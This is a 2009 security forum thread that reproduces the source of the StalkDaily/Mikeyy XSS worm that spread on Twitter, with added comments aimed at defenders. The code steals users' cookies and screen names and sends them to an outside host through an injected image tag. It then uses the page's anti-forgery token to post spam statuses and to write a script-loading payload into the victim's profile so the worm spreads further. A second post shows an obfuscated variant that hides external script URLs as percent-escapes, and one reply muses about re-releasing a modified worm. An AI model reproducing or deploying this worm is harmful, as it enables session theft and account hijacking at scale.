Another Ajax powered XSS worm by Acidus at 10:06 pm EDT, Apr 12, 2009 |
An XSS/Ajax worm hit Twitter. But it's cool, because Ajax doesn't help amplify XSS attacks, right? Oh, wait, maybe it does. ;-) Update: Source
// XHConn: constructor that wraps whichever XMLHttpRequest implementation the
// browser offers and exposes one method, connect(sURL, sMethod, sVars, fnDone).
// Nothing in this helper is malicious by itself. It matters here because the
// callers further down pass relative paths, so every request goes to the origin
// of the page the script was injected into, and the browser attaches the
// viewer's session to it.
function XHConn()
{
var xmlhttp, bComplete = false;
// Probe the two legacy IE ActiveX objects first, then the native object.
try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
catch (e) { try { xmlhttp = new XMLHttpRequest(); }
catch (e) { xmlhttp = false; }}}
// No transport available. When the function is invoked with `new`, JavaScript
// ignores this null and hands back the (empty) object instead.
if (!xmlhttp) return null;
// connect(): send one asynchronous request.
//   sURL    - target URL, used as given
//   sMethod - HTTP method, upper-cased before use
//   sVars   - already-encoded parameters (query string for GET, body otherwise)
//   fnDone  - called once with the transport object when readyState reaches 4
// Returns true once send() has been called, false if anything in the try throws.
this.connect = function(sURL, sMethod, sVars, fnDone)
{
if (!xmlhttp) return false;
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET")
{
// GET: parameters ride in the URL, so the body is emptied.
xmlhttp.open(sMethod, sURL+"?"+sVars, true);
sVars = "";
}
else
{
// Any other method: parameters are sent as a form-encoded body.
xmlhttp.open(sMethod, sURL, true);
xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
}
// bComplete guards against the callback firing more than once per request.
// fnDone is called unconditionally; a caller that omits it gets a TypeError
// in this handler, but only after the request has already completed.
xmlhttp.onreadystatechange = function(){
if (xmlhttp.readyState == 4 && !bComplete)
{
bComplete = true;
fnDone(xmlhttp);
}};
xmlhttp.send(sVars);
}
// Every failure is collapsed into a bare `false`; the cause is discarded.
catch(z) { return false; }
return true;
};
return this;
}
// urlencode: form-style percent-encoding of `str`.
// Steps, in order: encodeURIComponent(); then replace the characters that
// encodeURIComponent leaves alone (' ( ) * ~ !) with their %XX escapes and turn
// %20 into '+'; finally upper-case the hex digits of every %xx escape.
// Returns the encoded string.
function urlencode( str ) {
// The outer tmp_arr is never used; only the one inside replacer() is.
var histogram = {}, tmp_arr = [];
var ret = str.toString();
// Replace-all implemented as split/join, so `search` is taken literally.
var replacer = function(search, replace, str) {
var tmp_arr = [];
tmp_arr = str.split(search);
return tmp_arr.join(replace);
};
histogram["'"] = '%27';
histogram['('] = '%28';
histogram[')'] = '%29';
histogram['*'] = '%2A';
histogram['~'] = '%7E';
histogram['!'] = '%21';
histogram['%20'] = '+';
ret = encodeURIComponent(ret);
// `search` and `replace` are assigned without a declaration, so in sloppy mode
// they become globals (and this loop would throw in strict mode).
for (search in histogram) {
replace = histogram[search];
ret = replacer(search, replace, ret)
}
// The pattern has no `i` flag: it only touches escapes whose two characters
// are lower-case letters or digits, and rewrites them in upper case.
return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
return "%"+m2.toUpperCase();
});
// Unreachable: the function has already returned on the statement above.
return ret;
}
// Stage 1 of the sample: runs immediately when the script loads in the
// victim's page and sends session data to a third-party host.
// Serialise the whole document so values embedded in the markup can be
// pulled out with regular expressions.
var content = document.documentElement.innerHTML;
// Greedy capture of the content attribute of the session-user-screen_name
// meta tag, i.e. the logged-in user's screen name. `userreg` is undeclared
// and therefore an implicit global.
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
// exec() returns null when the tag is absent; this line then throws and the
// rest of the script never runs.
username = username[1];
var cookie;
// Only cookies readable from script end up here: cookies flagged HttpOnly do
// not appear in document.cookie. That limits what is stolen; it does not stop
// the in-page requests made later, which ride on the session implicitly.
cookie = urlencode(document.cookie);
// Exfiltration channel: an <img> whose URL carries the encoded cookie string
// and the (unencoded) screen name in its query string. The browser fetches it
// as an ordinary image, so no cross-origin XHR is needed.
// Defensive notes: an img-src allow-list in Content-Security-Policy blocks
// this request, and egress logs showing cookie-shaped query strings sent to
// an unrelated host are a usable detection signal.
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
// Second image request with no parameters; presumably a hit counter or
// beacon for the promoted site (cannot be confirmed from this listing).
document.write("<img src='http://stalkdaily.com/log.gif'>");
// Stage 2 of the sample: acts as the logged-in viewer. It issues two
// same-origin POSTs: one publishes a status message, the other rewrites the
// account's profile URL field.
// Lesson for defenders: the anti-CSRF token gives no protection once script
// runs inside the page, because the script can read the token straight out of
// the markup, as the first lines below do.
function wait()
{
var content = document.documentElement.innerHTML;
// Pull the per-session form token out of the inline script that defines
// twttr.form_authenticity_token. `authreg` is an implicit global; a missing
// match makes authtoken[1] throw.
authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
// Leftover debugging line from the author.
//alert(authtoken);
// Pool of six status messages; one is picked at random so that the posts
// are not all identical.
var randomUpdate=new Array();
randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1]="Join www.StalkDaily.com everyone!";
randomUpdate[2]="Woooo, www.StalkDaily.com :)";
randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4]="Wow...www.StalkDaily.com";
randomUpdate[5]="@twitter www.StalkDaily.com";
var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
updateEncode = urlencode(genRand);
// Value written into the profile URL field. After the URL it closes a
// double-quoted attribute and the anchor, adds a <script> tag that loads an
// external file, then opens a new `<a ` to absorb the rest of the original
// tag. Presumably the site rendered this field into an href without
// attribute-encoding it, which would make every view of the profile run the
// script again. The root-cause fix is on the output side: encode the value
// for an HTML-attribute context and accept only well-formed http(s) URLs.
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
// POST 1: publish the chosen message as the viewer. connect() is called with
// three arguments, so no completion callback is supplied.
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
// POST 2: store the markup above in user[url] through the settings endpoint.
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
// Schedules wait() 3250 ms after the script loads. The string form of
// setTimeout evaluates its argument as code; a Content-Security-Policy without
// 'unsafe-eval' refuses string timers like this one.
setTimeout("wait()",3250);
RE: Another Ajax powered XSS worm by Rattle at 1:51 pm EDT, Apr 13, 2009 |
Acidus wrote: An XSS/Ajax worm hit Twitter. But its cool, because Ajax doesn't help amplify XSS attacks right? oh, wait, it does.
This is so fucking lame: var randomUpdate=new Array();
randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1]="Join www.StalkDaily.com everyone!";
randomUpdate[2]="Woooo, www.StalkDaily.com :)";
randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4]="Wow...www.StalkDaily.com";
randomUpdate[5]="@twitter www.StalkDaily.com"; The evil side of me thinks it would be fun to patch the virus to something like this and re-release it: var randomUpdate=new Array();
randomUpdate[0]="Dude, I don't see any of these killer robots you are tweating about. What's the fuss?";
randomUpdate[1]="Join the fight against the killer robots everyone!";
randomUpdate[2]="Woooo, we've finally got killer robots! Soon maybe flying cars finally :)";
randomUpdate[3]="Virus!? What? This isn't a bunch of infected vacuum cleaners we are talking about here.. THESE ARE KILLER ROBOTS FROM OUTER SPACE!";
randomUpdate[4]="Wow...I just watched a killer robot eat my mailman..";
randomUpdate[5]="@twitter It's all your fault, the killer robots use twitter to communicate!"; |
RE: Another Ajax powered XSS worm by Worthersee at 3:01 pm EDT, Apr 13, 2009 |
Cute obfuscation
// String table of the obfuscated variant. The code that follows looks up every
// property name and literal by index (_0xc26a[0x0], _0xc26a[0x1], ...), so this
// array is the quickest place to read what the script touches.
// - Most entries match the literals of the readable sample earlier on this
//   page (ActiveX names, "/status/update", "authenticity_token=", ...).
// - Additional request strings target "/account/profile_settings" and a
//   user[name] field; how they are used is not visible in this excerpt.
// - Three entries hide a <script src=...> tag as percent-escapes inside a regex
//   literal whose .source is passed to unescape() and document.write().
//   Decoded (defanged) they load:
//     hxxp://content.ireel[.]com/jsxss.js
//     hxxp://content.ireel[.]com/xssjs.js
//     hxxp://bambamyo.110mb[.]com/wompwomp.js
//   Filters that look for a literal "<script src" miss this form; the
//   percent-encoded prefix %3c%73%63%72%69%70%74 inside a stored profile field
//   is the corresponding indicator.
// NOTE(review): as captured here the array is not valid JavaScript (inner
// double quotes are unescaped and the last entry ends in `""`); presumably the
// forum rendering dropped the backslashes. Treat it as a transcript.
var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "POST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];
function XHConn(){
var _0x6687x2,_0x6687x3=false;
try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }
catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }
catch(e) { try { _0x6687x2= new XMLHttpRequest(); }
catch(e) { _0x6687x2=false; }; }; };
if (!_0x6687x2) { return null; } ;
this[_0xc26a[0x2]]=function (_0x6687x4,_0x6687x5,_0x6687x6,_0x6687x7) {
if (!_0x6687x2) { return false; };
_0x6687x3=false;
_0x6687x5=_0x6687x5[_0xc26a[0x3]]();
try {
if(_0x6687x5==_0xc26a[0x4]) {
_0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4+_0xc26a[0x5]+_0x6687x6,true);
_0x6687x6=_0xc26a[0x7];
} else {
_0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4,true);
_0x6687x2[_0xc26a[0xb]](_0xc26a[0x8],_0xc26a[0x9]+_0x6687x4+_0xc26a[0xa]);
_0x6687x2[_0xc26a[0xb]](_0xc26a[0xc],_0xc26a[0xd]);
} ;
_0x6687x2[_0xc26a[0xe]]=function () {
if (_0x6687x2[_0xc26a[0xf]]==0x4&&!_0x6687x3) {
_0x6687x3=true;
_0x6687x7(_0x6687x2);
} ;
... [ Read More (0.4k in body) ] |